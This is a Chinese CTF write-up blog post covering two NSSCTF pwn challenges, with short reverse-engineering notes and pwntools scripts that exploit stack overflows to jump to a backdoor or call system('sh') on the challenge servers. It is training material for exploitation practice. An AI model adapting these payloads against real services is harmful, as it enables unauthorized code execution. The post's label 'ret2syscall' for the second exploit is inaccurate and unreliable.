首页 > 其他分享 >NSSCTF(PWN)9

NSSCTF(PWN)9

时间:2024-10-08 19:21:01浏览次数:8  
标签:binsh system padding sh io PWN payload NSSCTF

[HDCTF 2023]pwnner

发现这是一个64位文件

发现vuln双击进入

我们发现第14行涉及栈溢出,且第7行告诉我们这里伪随机数种子是39,第11行这里涉及随机值判断

我们运行写好的c语言,得到这个伪随机数

发现这题有system和binsh找到他们

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','22008')
door = 0x4008b2
padding = b'a'*(0x40+0x8)
io.recvuntil(b'name:')
io.sendline(str(1956681178))
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

[WUSTCTF 2020]getshell2

发现这是一个32位文件

发现vulnerable()双击进入

只有read典型的栈溢出

发现有system但是没有binsh

发现sh,知道这题是一道ret2syscall,有system没有binsh,把sh代替binsh

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','21192')
system = 0x8048529
sh = 0x8048670
padding = b'a'*(0x18+0x4)
payload = padding + p32(system) + p32(sh)
io.sendline(payload)
io.interactive()

flag有点难找,在home目录的ctf中

标签:binsh,system,padding,sh,io,PWN,payload,NSSCTF
From: https://blog.csdn.net/fanshaoze/article/details/142744617

相关文章

  • 菜鸟笔记之pwn工具篇--pwntools库的基本使用
    啥是pwntools?Pwntools是一个用于漏洞利用和二进制分析的Python库,广泛应用于安全研究、渗透测试和竞争性编程(如CTF,CaptureTheFlag)中。它为用户提供了一套强大的工具和功能,以简化与二进制文件的交互、网络通信以及各种常见任务的执行。简而言之,pwntools可以说是pwn手必备的......
  • 菜鸟笔记之pwn工具篇--Pwndbg基础使用
    什么是pwndbg?它是gdb的一个插件,增加了许多功能,来帮助pwn手可以快速寻找到所需要的信息,除了pwndbg之外还有peda、gef等工具可以用来协助进行调试。如何给pwndbg分屏?vim~/.gdbinitsetcontext-output/dev/pts/2#这里修改成2,那么就会在第二个终端显示信息pwndbg的基础操......
  • NSSCTF(PWN)4
    [GDOUCTF2023]Shellcode使用checksec发现这是64位文件查看main函数发现这题涉及到了栈溢出我们点开第一个read,name发现位于bss段中,就想到这里涉及到了shellcode,但是使用 shellcraft默认生成的字节数是44字节,这里最大输入数才25字节,所有不能使用默认生成这里我们就......
  • NSSCTF(PWN)3
    [HGAME2023week1]test_nc这是一道简单的nc签到题,直接终端nc就行[NISACTF2022]ezpie使用checksec,发现这题是32位且开了PIE进入main函数,我们要打印一个Input,发现了vuln双击进入这里涉及了严重的栈溢出因为这道题涉及PIE我们要找到main和shell的偏移量经过计算s......
  • 安装ubuntu以及pwn的环境搭建
    推荐pwn方向Pwn环境搭建基本工具:gdb+peda+pwndbg、gcc、Pwntools、Capstone、gcc-multilib、socat、rp++、readelfROPgaget、libc-database、objdump、file、string、checksec ubuntu下载本人推荐清华大学开源软件镜像站:清华大学开源软件镜像站|TsinghuaOpenSourc......
  • 极客大挑战2023-pwn-nc_pwntools WriteUp
    主要考查点Pwntools工具的基本使用方法解题思路1.nc连接题目,得到提示:根据题目,要求发送一个100长度的字符串,而且末尾需要为Sycloverb'A'*92+b'Syclover'2.发送第一个请求后进入第二步要求短时间内计算一个复杂算式,自己算是肯定不可能的,所以pwntools的recv来接收并完成......
  • buuctf pwn [第五空间2019 决赛]PWN51
    首先用checksec检查一下,发现是32位的,还有栈保护。然后将其放入ida32,查看main函数,幸运的发现有system。然后接下来就是理解这段反编译代码在讲什么,它的意思是它会随机生成一个4字节大小的数据,然后我们输入的passwd要与其相等。但是我们并不知道它随机生成的是什么,所以我们可以......
  • buuctf pwn jarvisoj_level01
    首先,将下载的文件用checksec检查一下然后我们将其放入ida64中,按tap键查看源码点开vuln函数,看见有read,buf,发现buf占0x80空间,而,read里面有0x200,所以会有溢出。这里显示buf的地址为0x80+8,即136。然后有发现有system函数那就简单多了,它的起始地址为0x400596接下来写代码......
  • BUUCTF(PWN)- rip
    BUUCTF(PWN)-rip打开题目得到靶机信息:node5.buuoj.cn:29045和附件pwn1查看文件信息为64-bit,用ida打开附件首先shift+f12查找字符串,能看见system、/bin/sh字样,点击pleaseinput或者ok,bye!!!跳转直接进入main函数查看gets并没有限制输入,gets函数的缓冲......
  • NSSCTF [HUBUCTF 2022 新生赛]simple_RE(变种base64编码)
    文件无壳拖入IDA中shift+F12查看可疑字符串发现两串字符串一看这两个等于号就猜测是base64编码进入主函数看看这段代码是一个简单的C语言程序,主要功能是接受用户输入的字符串作为“flag”,然后通过对输入的字符串进行一些处理和比较来验证是否输入了正确的“flag”。......